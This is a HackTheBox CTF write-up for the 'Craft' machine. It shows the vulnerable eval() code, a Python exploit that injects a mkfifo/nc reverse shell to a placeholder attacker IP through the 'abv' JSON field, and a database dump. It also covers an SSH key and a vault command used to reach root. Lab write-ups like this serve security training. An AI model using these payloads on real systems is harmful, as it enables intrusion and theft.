Post

Craft @ HackTheBox

Craft is a medium difficulty box.

User

First we enumerate sub domains and find “https://gogs.craft.htb/”, where we find credentials in the commit history: “dinesh:4aUh0A8PbVJxgd”. In addition there is a vulnerable function in the source code, containing an eval:

1
2
3
4
5
6
7
8
9
10
11
def post(self):
    """
    Creates a new brew entry.
    """

    # make sure the ABV value is sane.
    if eval('%s > 1' % request.json['abv']):
        return "ABV must be a decimal value less than 1.0", 400
    else:
        create_brew(request.json)
        return None, 201

We use a custom post request to get a shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests
from requests.auth import HTTPBasicAuth
import json

auth = "https://api.craft.htb/api/auth/login"

r = requests.get(auth, auth=HTTPBasicAuth('dinesh', '4aUh0A8PbVJxgd'), verify=False)
token = json.loads(r.text)['token']

brew = "https://api.craft.htb/api/brew/"

r = requests.post(brew, headers={
    'X-Craft-API-Token': token,
    'Content-Type': 'application/json'
}, data=json.dumps({
    "id": 0,
    "brewer": "string",
    "name": "xct",
    "style": "xct",
    "abv": "__import__('os').system('rm /tmp/.xsh;mkfifo /tmp/.xsh;cat /tmp/.xsh|/bin/sh -li 2>&1|nc <ip> 443 > /tmp/.xsh')"
}), verify=False)
print json.loads(r.text)

In the apps settings in “/opt/app/craft_api/settings.py” we find db credentials: “craft:qLGockJ6G2J75O”. We now connect to the database via python and dump the tables, obtaining another set of credentials: “gilfoyle:ZEU3N8WNM2rh4T”

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import sys
import pymysql

db_name = 'craft'
connection = pymysql.connect(host='172.20.0.4',
                             user=db_name,
                             password='qLGockJ6G2J75O',
                             db=db_name,
                             cursorclass=pymysql.cursors.DictCursor)
try:
    with connection.cursor() as cursor:
        #sql = "SELECT * FROM `user`"
        sql = f"SELECT TABLE_NAME,TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA NOT LIKE 'information_schema%'"
        cursor.execute(sql)
        print(repr(cursor.fetchall()))
finally:
    connection.close()

Using the creds we can log into gogs as gilfoyle and find the private ssh key of gilfoyle in his repo. With this key we can log into the box as gilfoyle via ssh (the passphrase is his password we got before) and grab user.txt

Root

We issue vault write ssh/creds/root_otp ip=172.20.0.2 to get a ssh password for root, then use ssh root@localhost to connect and can grab root.txt

This post is licensed under CC BY 4.0 by the author.